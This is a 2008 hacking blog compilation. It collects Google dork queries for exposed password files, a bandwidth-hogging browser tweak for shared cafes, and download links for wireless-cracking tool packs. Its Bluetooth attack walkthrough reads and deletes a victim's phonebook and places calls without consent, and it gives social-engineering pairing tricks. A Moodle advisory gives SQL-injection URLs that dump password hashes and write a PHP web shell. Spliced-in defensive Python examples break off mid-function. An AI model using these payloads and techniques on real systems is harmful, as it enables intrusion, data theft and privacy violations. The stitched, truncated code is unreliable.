Saturday, 22 March 2008

Google Hacking - Advanced Guide

I am sure you know the situation. When googling for a technical text, the search engine puts together a "great offer" from a book e-shop, or when looking for a specialized forum you find an advert for a holiday in Spain in first place. Today almost everyone is an "SEO expert" (read fucker), and defining the right query can be tricky. When the query comes out well, you can be surprised by the result :) How to start? Just have a look at the Google Help Center. Briefly: use an operator or a combination of operators. That is the theory.. and what about the reality?

The first option is to spend your money on a clever book, where you will learn nothing that cannot be found on the internet.
Another option is to find a "place" where they know it and will "share it" :) - or share their own specialized applications.

The last and best option is to know about projects that run superstructures on top of Google (yes, even such places exist) and directly generate the right search strings from a keyword.

The power of searching (read: information) can be demonstrated with a simple example.. This shot of a tram accident is not yet in any (TV, radio, internet) news.

Thanks to the search engine you know about it many hours in advance. You just have to know how and where to look for it.


A few examples of more advanced Google searching.


Filtering:

The AirDump.Net page without pictures and styling - filtered version.

eBook:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.txt|.lit|.doc|.rtf|.zip|.rar|.pdf|.chm) "hacking linux"

Music:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma|.ogg) "buena vista"

intitle:"index.of" (mp3|mp4|avi) tricky -html -htm -php -asp -cf -jsp -e-mp3s.eu

Passwords:

inurl:passlist.txt

inurl:password.txt

inurl:config.php

Video:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mpg|.avi|.wmv|.di) "wep"

Live WebCam

intitle:liveapplet inurl:LvAppl

"powered by webcamXP"

Serial Key, Licence:

"computer profile summary" AND "licence" AND "key:" AND "vista"

--
The terms in "..." and (...) can be changed freely..
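Seen from the defender's side, the queries above only match when a server publishes auto-generated directory listings or leaves files such as password.txt where a crawler can fetch them. The following is an added example, not part of the original post, that checks pages fetched from your own site for the same markers; the sample HTML, the function name and the class name are constructed for illustration.

```python
from html.parser import HTMLParser

# Text the "index of" queries above depend on; all three strings appear in
# auto-generated directory listings.
LISTING_MARKERS = ("index of", "last modified", "parent directory")
# File names and extensions taken from the queries on this page.
SENSITIVE_NAMES = {"passlist.txt", "password.txt", "config.php"}
DOCUMENT_EXTS = (".txt", ".lit", ".doc", ".rtf", ".zip", ".rar", ".pdf", ".chm")


class LinkCollector(HTMLParser):
    """Collects the <title> text and every href found in a page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.links = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def audit_page(url, html):
    """Report whether a page of your own site would match the queries above."""
    parser = LinkCollector()
    parser.feed(html)
    text = html.lower()
    is_listing = ("index of" in parser.title.lower()
                  and all(marker in text for marker in LISTING_MARKERS[1:]))
    # Skip column-sort links ("?C=N;O=D") and sub-directories ("old/").
    names = [href.rsplit("/", 1)[-1].lower() for href in parser.links
             if not href.startswith("?") and not href.endswith("/")]
    return {
        "url": url,
        "directory_listing": is_listing,
        "sensitive": sorted(n for n in names if n in SENSITIVE_NAMES),
        "documents": sorted(n for n in names
                            if n.endswith(DOCUMENT_EXTS) and n not in SENSITIVE_NAMES),
    }


# Constructed sample: an auto-generated listing and an ordinary page.
SAMPLE_LISTING = """<html><head><title>Index of /backup</title></head><body>
<h1>Index of /backup</h1><table>
<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th>
<th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><td><a href="/">Parent Directory</a></td></tr>
<tr><td><a href="old/">old/</a></td><td>2008-02-11 09:14</td><td>-</td></tr>
<tr><td><a href="password.txt">password.txt</a></td><td>2008-03-01 10:00</td><td>1.2K</td></tr>
<tr><td><a href="manual.pdf">manual.pdf</a></td><td>2008-03-02 18:40</td><td>340K</td></tr>
</table></body></html>"""

SAMPLE_NORMAL = ("<html><head><title>Welcome</title></head>"
                 "<body><a href='about.html'>About</a></body></html>")

if __name__ == "__main__":
    for url, body in (("/backup/", SAMPLE_LISTING), ("/", SAMPLE_NORMAL)):
        print(audit_page(url, body))
```

A page flagged as a listing is fixed in the server configuration (on Apache, `Options -Indexes`); flagged files belong outside the document root.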

Useful operators:

site - searches pages whose domain contains .cz
Example: site:cz specification "802.11" (terms such as -cisco -something filter out a surplus of undesirable results)

cache - searches in the cache
intitle - searches in the title
filetype - searches for a specific file type
inurl - searches for a term contained in the URL
allintext - searches the text of a specific page

The virtual space is overfilled with interesting things.. and a description of even the smallest one would cover a lot of pages.

Utilities at the end: Google Fight compares how often each of (for example, two similar) words is used on the net.

A database of web cameras that can be connected to (configured) from the internet can be found on the Opentopia pages.

Other reading about Hacking Google :)

Useful links and a few torrents at the close.




Hacking bandwidth From Mozilla Firefox

Have you ever had trouble with the tragedy of a bandwidth tug-of-war between computers on an internet network?? weww.. surely you have..

Take an internet cafe, for example… it happens because every booth/room already has its bitrate and bandwidth limited…
Maybe this can be a solution:

1). Open the Mozilla Firefox browser

2). In the Address Bar type: about:config

3). Look for the strings below (make sure all the strings below are "TRUE"):

Example of changing one:
network.http.pipelining FALSE ==> right-click and choose "Toggle"

network.http.pipelining TRUE

network.http.pipelining.maxrequests 64

network.http.proxy.pipelining TRUE

network.proxy.share_proxy_settings FALSE <=== this one must be False

4). Create a new string as follows: left-click once anywhere, then right-click NEW>>INTEGER

5). Type: nglayout.initialpaint.delay and give it the value 0

6). Then REFRESH or press F5

7). In the Address Bar type: about:blank

8). Click the menu:
For Windows XP: TOOLS>>OPTIONS>>WEB FEATURES
For Linux: EDIT >> PREFERENCES
For the differing settings on some OSes: EDIT >>ADVANCED

9). Under Options:
ALLOW WEB SITES TO INSTALL SOFTWARE - tick the check box to enable it

10). Then press OK and REFRESH (F5)

11). Go to this link:
https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125

or:
https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox

12). Download the SwitchProxy Tool version 1.3.4 software from the link above

13). When it has finished, do not press the UPDATE button

14). Click the X (close) in the top right corner of the pop-up window that appears

15). Close all Mozilla Firefox browser windows,

16). Then open the browser again to activate the SwitchProxy Tool version 1.3.4 software that was just installed

17). If the installation succeeded, an additional toolbar appears below the navigation toolbar and address bar.

Now the Mozilla browser is ready to use……. ::
Message ::
- Besides switching proxies automatically in the Mozilla Firefox browser, the engine of this SwitchProxy Tool version 1.3.4 software also affects internet connection speed
- This method is very effective when used in a crowded internet cafe to pull bandwidth (the majority of the internet access speed) to the computer that is online
- Be careful: significant changes occur on BROADBAND internet connections

Wireless Tools


Level 1:
aerosol.zip Aerosol (0.65)
abappwd.zip ABAP PW Crack
aircrack.zip Aircrack (2.4)
aircrackng.zip Aircrack-NG (0.6.2)
aircrackpack.zip Aircrack Pack
aire.zip Aire (1.0)
airsnort.zip Airsnort
asleap.zip Cisco Leap (1.0)
aptools.zip AP Tools (0.1.0)
cowpatty.zip Cowpatty
netstumbler.zip Netstumbler AP Detection (0.4.0)
weplab.zip WepLab (0.1.5)
Download:
http://rapidshare.com/files/25265188/Feliks_wireless_pack.zip

Level 2:[update]
EasyWifiRadar
HotSpotter-0.4
Kismet 2005-08-R1
Wellenreiter-v1.9
wepwedgie-alpha-0.1
Download:
http://rapidshare.com/files/26345803/Feliks_wireless_pack_2.zip

Additional:
+ the WireShark download:
http://wireshark.newworldorder.com.es/win32//wireshark-setup-0.99.5.exe

+The wireshark official site:
http://www.wireshark.org/download.html

AttachMent Best:
http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar

Saturday, 15 March 2008

Hacking Bluetooth [in]Security

Art From: echo|zine, volume 4 issue 15

[ 101 A Bluetooth [in]Security ]
[ y3dips ]


---// Introduction

Bluetooth is one of the cable-replacement technologies; it consumes little
electrical power, is relatively cheap, has a relatively short range
(10-100m), and can be used to exchange data and voice.

Research on "bluetooth" technology carried out by ericsson(tm) in 1998 had
a considerable impact on "cable replacement" technology, or what I more
often know as "wireless technology". This research was then continued by a
group calling itself the Special Interest Group under the "codename"
bluetooth, supported by many large companies with an interest in this
technology. As a result, the first version (bluetooth ver 1.0) was released
in 1999, and the version in use now is version 2.0 (which is ver 1.2 plus
EDR).

Bluetooth technology is still used and developed to this day in roughly
856 products[3].

---// Why attacking bluetooth ?

1. Bluetooth is used on personal equipment that generally also stores
important personal information, which makes it a valuable target for an
attacker

2. To attack a bluetooth device the attacker does not need to get past
layers of firewall, policy, third party security application, IDS/IPS.

3. It can be found in many places because the service is used on many
"devices".

---// Technical Details

- Uses the 2.4GHz frequency
- 79 channels, with frequency hopping at 1600 hops/second
- Uses a "single chip radio", so it is relatively cheap
- Has a "range" of 10-100 meters
- Uses 2.5 mW
- Has a data rate of 1Mbps

---// Bluetooth Mode

-------[ 1. Service mode

a. "on" mode
In "on" mode there are the "discoverable" and "un-discoverable" modes.
When discoverable, the "device" can be found by other "devices", while
un-discoverable mode means that in general it cannot be found by other
"devices".

b. "off" mode
The bluetooth service is off in this mode

c. "automatic" mode
This mode makes it easier for applications to use the bluetooth service

-------[ 2. Security mode

a. Security mode level 1
No security at all

b. Security mode level 2
Security exists at the "service" level, but not at the "device" level.

c. Security mode level 3
Security exists at the "device" level and is enforced at every lower
level.

---// Bluetooth Security threat

-------[ 1. Bluejacking

This technique works by sending a message/picture/phone number to the
target without permission. The purpose ranges from a prank to "social
engineering" that lures the target into pairing with the attacker's
"device".

-------[ 2. Bluesnarfing

This technique allows the attacker to connect to the target's "device"
without the owner knowing, and lets the attacker access important data
stored on the target "device" such as the list of phone numbers (phone
book), "business cards", "images" and even the IMEI (International Mobile
Equipment Identity), which can lead to the number being "cloned".

-------[ 3. BlueBugging

This technique connects the target "device" and the attacker over a serial
link and gives the attacker full control of the target "device", so the
attacker can also execute the AT (ASCII Terminal) command set, for example
to make calls, send and read SMS, and make network or even internet
connections through the target "device", all the way to "identity theft".

-------[ 4. BlueSmack

This technique performs a Denial Of Service attack against the target
device; one way is to use the l2ping command on the L2CAP protocol.

-------[ 5. Backdoor Attack

This technique exploits a "pairing" that has been established between the
target "device" and the attacker. It relies on the target's carelessness
and on social engineering.


---// Basic Penetration

Below I carry out a basic penetration of bluetooth security, in the hope
that it gives a deeper understanding of the subject.

-------[ 0. Info

Target : Mobile phone Sony ericsson t68i
Attacker : Toshiba tecra 8100
Linux Ubuntu 5.10 Operating system
USB bluetooth dongle with Bluez

Tools : Bluesnarfer
Bluez-utils
RedFang

-------[ 1. Preparation

Now check the bluetooth device (USB dongle) using hciconfig (part of the
Bluez package)

//--- command ----//

y3dips@hogwartz:~$ hciconfig -a hci0
hci0: Type: USB
BD Address: 00:09:DD:10:4E:B1 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN ISCAN
RX bytes:394 acl:0 sco:0 events:18 errors:0
TX bytes:319 acl:0 sco:0 commands:17 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: SLAVE ACCEPT
Name: 'hogwartz-0'
Class: 0x3e0100
Service Classes: Networking, Rendering, Capturing
"device" Class: Computer, Uncategorized
HCI Ver: 1.1 (0x1) HCI Rev: 0x460 LMP Ver: 1.1 (0x1) LMP Subver: 0x460
Manufacturer: Cambridge Silicon Radio (10)

//--- command ----//

This gives several important pieces of information, among them:
1. Type: USB
2. BD Address: 00:09:DD:10:4E:B1
3. Service Classes: Networking, Rendering, Capturing

Good, the "device" is working and is recognized by the system.

-------[ 2. Scanning

Once all the preparation has gone well, the next step is to find the
target. To detect bluetooth services that are active ("on" mode) and also
"discoverable", I only use hcitool (Bluez package)

//--- command ----//

y3dips@hogwartz:~$ hcitool scan
Scanning ...
00:0A:D9:49:B6:8B T68i
00:0C:55:FF:F3:B6 heaven-0
00:D5:F9:33:B6:A4 dodlesvck
00:60:57:44:56:B3 6310i

//--- command ----//

Yup, I found 4 "devices" with their bluetooth service enabled, and I
decided to explore them one by one, carrying out the penetration in the
order listed :)

The next step is to get better acquainted with the "device". For this,
sdptool (Bluez package) is used for browsing, and I add "grep" specifically
to find which services the "device" offers. The "device" is identified by
its bluetooth address.

In this case the first "device" is 00:0A:D9:49:B6:8B

//--- command ----//

y3dips@hogwartz:~$ sdptool browse 00:0A:D9:49:B6:8B | grep Service\ Name
Service Name: Dial-up Networking
Service Name: Fax
Service Name: Voice gateway
Service Name: Serial Port 1
Service Name: Serial Port 2
Service Name: OBEX Object Push
Service Name: IrMC Synchronization
Service Name: Voice gateway

//--- command ----//

And we find that the device offers the services Dial-up Networking, Fax,
Voice Gateway, Serial Port, OBEX, IrMC.

To check connectivity with the device we can ping it.

//--- command ----//

y3dips@hogwartz:~$ sudo l2ping 00:0A:D9:49:B6:8B
Ping: 00:0A:D9:49:B6:8B from 00:09:DD:10:4E:B1 (data size 44) ...
0 bytes from 00:0A:D9:49:B6:8B id 0 time 46.69ms
0 bytes from 00:0A:D9:49:B6:8B id 1 time 31.24ms
0 bytes from 00:0A:D9:49:B6:8B id 2 time 37.95ms
0 bytes from 00:0A:D9:49:B6:8B id 3 time 33.01ms
0 bytes from 00:0A:D9:49:B6:8B id 4 time 48.04ms
5 sent, 5 received, 0% loss

//--- command ----//

-------[ 3. Owning

After scanning and obtaining the target's address and information about
the services the device offers, we will next perform "snarfing" against
the bluetooth device (Bluesnarfing).

One possible attack is reading the device's phone book using bluesnarfer.

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
+ 1 - My Sephia /M : 08883535266
+ 3 - Mbah Marijan/W : 021454545
+ 5 - Osama Laden/W : 662224258
+ 7 - Warung Pecel Bu Roso/W : 0214545889
+ 9 - Superman/W : 911
bluesnarfer: release rfcomm ok

//--- command ----//

Next we can also delete the phone book

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -w 1-10
"device" name: T68i
delete of entry 1 successfull
delete of entry 2 successfull
delete of entry 3 successfull
delete of entry 4 successfull
delete of entry 5 successfull
delete of entry 6 successfull
delete of entry 7 successfull
delete of entry 8 successfull
delete of entry 9 successfull
delete of entry 10 successfull
bluesnarfer: release rfcomm ok

checking whether it has been deleted

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
bluesnarfer: release rfcomm ok

//--- command ----//

In addition I will try Bluebugging by executing an AT command, in this
case ATD (make a call)

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -c 'ATD555;'
"device" name: T68i
custum cmd selected, raw output
OK
bluesnarfer: release rfcomm ok
y3dips@hogwartz:~/Desktop/bluetooth/pentest/snarf$

//--- command ----//

But remember, making this call will show on the target's screen that a call
to a certain number is in progress. (So it is best to make the call while
the target is not interacting directly with the device)

---// 31337 penetration

-------[ 1. Backdooring

The Backdooring technique can be carried out with or without direct
interaction; its aim is to get the target "device" to "pair" with the
attacker's device.

Social engineering plays an important role in this technique.

Example

a. Direct interaction

As with social engineering in general, this is done by interacting
directly with the target device.

real life example:

Remember, changing the SIM card and switching the device on and off do
not remove a pairing that has been made. This gap led me to pretend that
my phone's battery had run out and borrow the target's phone to send an
SMS; to make the target more confident I used my own number (and to be
more convincing still, your phone really should not switch on). After
that, try to pair with your device. Before that there are 2 things I
have to do

1. set the PIN to be entered from the target's phone

//--- command ----//
root@hogwartz:~# echo "4321" > /etc/bluetooth/pin
//--- command ----//


2. And you need to read the syslog to find the address of the target
that connected.

//--- command ----//
root@hogwartz:~# tail -f /var/log/syslog | grep hcid
Aug 21 20:25:30 localhost hcid[8880]: pin_code_request \
(sba=00:09:DD:10:4E:B1, dba=00:0A:D9:49:B6:8B)
//--- command ----//

Yes, and now I just switch the phone off and swap the SIM card back; after
that it is only a matter of exploring the target "device".

b. Indirect interaction

This second way is combined with the BlueJacking technique. Here I only
need to send a picture/text/song or anything else to the target device,
so that the target checks the sender's device info shown on the target
"device"; if the target wants to accept the picture/text/song, they have
to pair and enter a PIN.

(the device name, which can be defined on my device) Because on some
"devices" the number of characters is not limited, it is possible to
write a "persuasive" sentence (the core of social engineering) such as
"NADINE'S PHOTO HERE?" or "TO RECEIVE, TYPE 4321"

Then just wait for the result of our pairing :).


-------[ 2. Detecting the undetected

All right, now what if the "device" is not set discoverable, so that I
have trouble getting the device address, and I cannot borrow the target's
phone ("device") for one reason or another (stingy, perhaps :P).

Luckily for me there is a published tool called "redfang" that is able to
detect bluetooth "devices" that have the service switched on but are not
set discoverable.

//--- command ----//

y3dips@hogwartz:~/bt/fang$ sudo ./redfang -r 000AD949B689-000AD949B68D
redfang - the bluetooth hunter ver 2.5
(c)2003 @stake Inc
author: Ollie Whitehouse
enhanced: threads by Simon Halsall
enhanced: "device" info discovery by Stephen Kapp
Scanning 5 address(es)
Address range 00:0a:d9:49:b6:89 -> 00:0a:d9:49:b6:8d
Found: T68i [00:0a:d9:49:b6:8b]
Getting "device" Information.. Failed.

//--- command ----//

And so I got the target's address. :) One of its weaknesses is that it is
very slow at finding devices; I often use the "-t" option to raise the
timeout and speed up scanning, or one can do a "recursive execute".
(automated ? -- in progress)


---// Myths in "bluetooth [in]security"

[1] Just switch the Bluetooth service off and you will be safe

Switching off the bluetooth service ("off" mode) on the "device" does not
make it 100% safe. Possible attacks are social engineering and malicious
programs (virus, worm & trojan) that can automatically switch the
bluetooth service on ("on" mode) or even carry out a pairing/backdoor
attack on the bluetooth "device".

So harden your device with a firewall and also antivirus

[2] Making it "[un]discoverable" will be safe

See the second part, "Detecting the undetected", of the sub-chapter
"31337 penetration"

[3] There is no important information on a bluetooth "device"

Wrong. Take "mobile devices" (phone, smart phone, laptop) as an example:
almost all important data is stored there. On a mobile phone, for
instance, you have all the numbers that matter to you even if you are not
an important person :P.

[4] The range is short

The range of a bluetooth device is generally short, 10-100 meters, but
with techniques for amplifying the signal[6] the reach can be extended,
even up to 1 km.

[5] The attacker will surely look "odd" and "suspicious" [because of
carrying around a laptop and a modified (signal-boosted) bluetooth device?]

Not really; nowadays an "assessment" can even be done from a mobile
phone/PDA (java supported)[2].

---// Defending ?

[1] Keep up to date with information about your "device" (especially on
security)
[2] Update your firmware if the "device" is among those suspected to be
affected
[3] Check the list of "trusted pairs" and delete those no longer needed, to
avoid backdoor attacks
[4] Use additional security features (eg: Antivirus, Firewall)
[5] To minimize attacks, switch your bluetooth service off when it is not
in use
[6] If it is needed, set a relatively strong PIN.
[7] Make sure not to connect/pair carelessly (eg: accepting files from an
"unknown device")

---// Clue

Some phones are open to the bluesnarfing or bluebug techniques when
visible (discoverable) and some others when non-visible
(non-discoverable), while several other models are not vulnerable except
through a backdoor attack and the bluejacking technique (social
engineering)

---// Glossary

Pairing is a state entered when two "devices" agree to communicate with
each other. Once this state exists, any later communication bypasses the
discovery and authentication process that normally takes place during an
interaction.

---// References ( echo.or.id - Ammar )

[1] y3dips, "Owned a mobile "device" via bluetooth", presented and
demonstrated at the "Cryptography and Wireless security seminar", 2006
[2] Trifinite official site`s. http://trifinite.org
[3] SIG. http://bluetooth.org
[4] http://thebunker.net
[5] wikipedia. http://en.wikipedia.org
[6] bluesniper. http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

---// Greetz

BUG on moodle PHP

-- Security Internet

Manual Testing Notes
to view user/admin password hashes:

http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='or%20isnull(1/0)/*

to inject a shell:

http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0.0.1&user='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../www/moodle/shell.php'%20FROM%20mdl_user/*

Solution Description
Upgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Vulnerability classification:
- Remote vulnerability
- Input manipulation attack
- Impact on integrity
- Exploit available
- Verified

Second checking :
http://www.milw0rm.com/exploits/1312
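Until an installation is upgraded, the requests in the testing notes above are easy to spot in a web server access log, because a user name has no reason to contain quotes or SQL keywords. The following is an added example, not part of the original advisory: it scans combined-format log lines for requests to `iplookup/ipatlas/plot.php` whose `user` parameter carries SQL syntax. The log lines, addresses and pattern names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script named in the testing notes above.
VULN_PATH = "/iplookup/ipatlas/plot.php"

# SQL fragments that have no place in the `user` parameter.
SQL_PATTERNS = [
    ("quote", re.compile(r"'")),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("into-dumpfile", re.compile(r"\binto\s+(dump|out)file\b", re.I)),
    ("comment", re.compile(r"/\*|--\s|#")),
]

# client ident user [time] "METHOD target protocol" status ...
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def suspicious_requests(log_lines):
    """Return one finding per request to plot.php with SQL syntax in `user`."""
    findings = []
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, when, _method, target, status = match.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(VULN_PATH):
            continue
        # parse_qs percent-decodes the values before they are inspected.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("user", []):
            hits = [name for name, rx in SQL_PATTERNS if rx.search(value)]
            if hits:
                findings.append({"client": client, "time": when,
                                 "status": int(status), "matched": hits})
    return findings


# Constructed access-log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.15 - - [22/Mar/2008:09:58:03 +0700] "GET /moodle/iplookup/ipatlas/'
    'plot.php?address=127.0.0.1&user=alice HTTP/1.1" 200 2210',
    '198.51.100.7 - - [22/Mar/2008:10:01:12 +0700] "GET /moodle/iplookup/ipatlas/'
    'plot.php?address=127.0.0.1&user=%27or%20isnull(1/0)/* HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Mar/2008:10:01:40 +0700] "GET /moodle/iplookup/ipatlas/'
    'plot.php?address=127.0.0.1&user=%27%20UNION%20SELECT%200,0%20INTO%20DUMPFILE'
    '%20%27x%27/* HTTP/1.1" 200 498',
    '203.0.113.9 - - [22/Mar/2008:10:05:00 +0700] "GET /search.php?user=o%27brien '
    'HTTP/1.1" 200 1033',
]

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request, followed by a new file in the web root, is the point at which this stops being a probe and becomes an incident.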


OK,
Thank you

Scanning Networks / Checking the network

Scanning helps one to know what services are running on a machine. It shows the open ports on which services are listening for connections. First we determine whether the target machine is alive. This can be done by sending an ICMP echo request packet to the server; the server responds with an ICMP echo reply, showing that it is alive. Doing this across a range of hosts or IP addresses is known as a ping sweep. Of the many methods used, we will look at ICMP ping and echo port ping.

ICMP ping

Your machine sends an ICMP echo request (type 8) to the target machine, which responds with an ICMP echo reply (type 0) if it is alive. You can use the Unix ping command to do this:

[root@ns2 root]# ping -c 3 66.218.71.86
PING 66.218.71.86 (66.218.71.86) from 203.41.193.140 : 56(84) bytes of data.
64 bytes from 66.218.71.86: icmp_seq=1 ttl=51 time=207 ms
From 203.41.193.137: icmp_seq=2 Redirect Host (New nexthop: 202.5.165.81)
64 bytes from 66.218.71.86: icmp_seq=2 ttl=51 time=204 ms
64 bytes from 66.218.71.86: icmp_seq=3 ttl=51 time=203 ms

--- 66.218.71.86 ping statistics ---
3 packets transmitted, 3 received, 0% loss, time 2019ms
rtt min/avg/max/mdev = 203.938/205.171/207.287/1.503 ms
[root@ns2 root]#

At the end it gives a summary showing the number of packets sent and received and the percentage of packet loss.

Echo port ping

This makes use of the echo service on the target machine, which runs on port 7. Whatever you send it is echoed back to you, so if you see your data echoed back you can be sure that the target machine is alive.

Two interesting tools on Linux are Fping and Nmap.

Fping

Fping sends multiple ICMP request packets simultaneously and processes the replies as they arrive, which makes ping sweeps faster. Fping can be fed a single IP address or a list of IP addresses in a file.

[root@Krishna]# fping -a -g 203.122.1.0 203.122.1.80
203.122.1.9
203.122.1.26
203.122.1.37
203.122.1.47
203.122.1.54
203.122.1.42
203.122.1.68
203.122.1.80
[root@Krishna]#

Type fping -h for a full listing of available options.

Nmap

Nmap is a powerful tool that can do a lot more than ping sweeps.
To use nmap for ping sweeping, use the -sP argument.
[root@ns2 root]# nmap -sP 203.122.58.0/24

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host (203.122.58.1) appears to be up.
Host (203.122.58.2) appears to be up.
Host (203.122.58.5) appears to be up.
Host (203.122.58.6) appears to be up.
Host (203.122.58.9) appears to be up.
Host (203.122.58.10) appears to be up.
Host (203.122.58.13) appears to be up.
Host (203.122.58.14) appears to be up.
caught SIGINT signal, cleaning up
[root@ns2 root]#

If ICMP is blocked at the firewall of the target machine, additional techniques can be used to determine whether systems are alive.
Nmap provides an advanced option called TCP ping scan. It is initiated with the -PT argument and a port number such as port 80, since packets to this port are allowed by many firewalls and border routers through to the systems in their demilitarized zone (DMZ).

[root@ns2 root]# nmap -sP -PT80 203.122.58.0/24

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host (203.122.58.1) appears to be up.
Host (203.122.58.2) appears to be up.
Host (203.122.58.5) appears to be up.
Host (203.122.58.6) appears to be up.
Host (203.122.58.9) appears to be up.
Host (203.122.58.10) appears to be up.
Host (203.122.58.13) appears to be up.
Host (203.122.58.14) appears to be up.
caught SIGINT signal, cleaning up
[root@ns2 root]#

Icmpenum

This tool is from Simple Nomad (http://www.nmrc.org/project/misc/icmpenum-1.1.1.tgz).
Even if the border router or firewall blocks ICMP echo packets, whether a system is alive can be determined by using a different ICMP type, such as ICMP timestamp requests and ICMP info requests.
[krishna]# icmpenum -i2 -c 192.168.1.0

In the above example we enumerated the entire 192.168.1.0 class C network using ICMP timestamp requests. Icmpenum can send spoofed packets to avoid detection: use the -s argument to send spoofed packets and passively listen for responses with the -p switch.

Icmpquery


Icmpquery can be found at http://packetstormsecurity.com/UNIX/scanners/icmpquery.c
Ping sweeps make use of ICMP echo packets, but there are many more types of ICMP packets that can be used to gather valuable information about a system. For example, you can request the time on a system by sending an ICMP type 13 message (TIMESTAMP), and you can request the netmask of a particular device with the ICMP type 17 message (ADDRESS MASK REQUEST).
To query a router's time, you can run the command:
[root@ns2 files]# ./icmpquery -t 213.206.75.252
213.206.75.252 : Sun Jun 8 16:46:30 2003
[root@ns2 files]#

and to query a router's netmask, use

[Krishna]# icmpquery -m 213.206.75.252

Windows tools:


To do ping sweeps on Windows, try the freeware Pinger from Rhino9 (http://nmrc.org/snt). Some other tools for Windows are Ping Sweep from Solarwinds (http://www.solarwinds.net), WS_Ping ProPack (http://www.ipswitch.com) and NetScan Tools (http://www.nwpsw.com).

Port Scanning:


Port scanning is the process of connecting to TCP and UDP ports on the target system to determine what services are running or in a listening state. Identifying listening ports is essential to determine the type of operating system and application in use on the system.

Types of port scanning:

1.) TCP connect scan: This type of scan connects to the target port and completes a full three-way handshake (SYN, SYN/ACK and ACK).
2.) TCP SYN scan: This is also called half-open scanning because it does not complete the three-way handshake. Instead a SYN packet is sent; if a SYN/ACK packet is received, the target machine's port is in a listening state, and if an RST/ACK packet is received, the port is not listening.
3.) TCP FIN scan: This technique sends a FIN packet to the target port, and based on RFC 793 the target system should send back an RST for all closed ports.
4.) TCP Xmas Tree scan: This technique sends a FIN, URG and PUSH packet to the target port, and based on RFC 793 the target system should send back an RST for all closed ports.
5.) TCP Null scan: This technique turns off all flags, and based on RFC 793 the target system should send back an RST for all closed ports.
6.) TCP ACK scan: This technique is used to map out firewall rulesets. It can help determine whether the firewall is a simple packet filter allowing only established connections or a stateful firewall performing advanced packet filtering.
7.) TCP Windows scan: This type of scan can detect both filtered and non-filtered ports on some systems due to an anomaly in the way the TCP window size is reported.
8.) TCP RPC scan: This technique is specific to UNIX systems and is used to detect and identify Remote Procedure Call (RPC) ports and their associated program and version number.
9.) UDP scan: This technique sends a UDP packet to the target port. If the target port responds with an "ICMP port unreachable" message, the port is closed; if not, the port is open. This is a slow process since UDP is a connectionless protocol, and the accuracy of this technique depends on many factors related to the utilization of network and system resources.
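Because each TCP scan type in the list sends a distinctive flag combination, a monitoring host can label inbound probes by reading the flags byte of the TCP header. The following is an added example, not part of the original article: it parses 20-byte TCP headers and reports sources that send the same probe type to several ports. The packet list, addresses, threshold and function names are constructed for illustration.

```python
import struct
from collections import defaultdict

# TCP flag bits (byte 13 of the TCP header).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag combinations of the probes described in the list above. A bare SYN
# looks the same for connect and SYN scans; they differ only in whether
# the handshake is later completed.
PROBE_TYPES = {
    SYN: "SYN (connect or half-open) scan",
    FIN: "FIN scan",
    FIN | PSH | URG: "Xmas tree scan",
    0: "Null scan",
    ACK: "ACK scan",
}


def tcp_header(sport, dport, flags, seq=0, ack=0, window=1024):
    """Build a 20-byte TCP header for the constructed samples (checksum 0)."""
    return struct.pack("!HHLLBBHHH", sport, dport, seq, ack,
                       5 << 4, flags, window, 0, 0)


def parse_flags(header):
    """Return (source port, destination port, flags) from raw TCP header bytes."""
    if len(header) < 20:
        raise ValueError("truncated TCP header")
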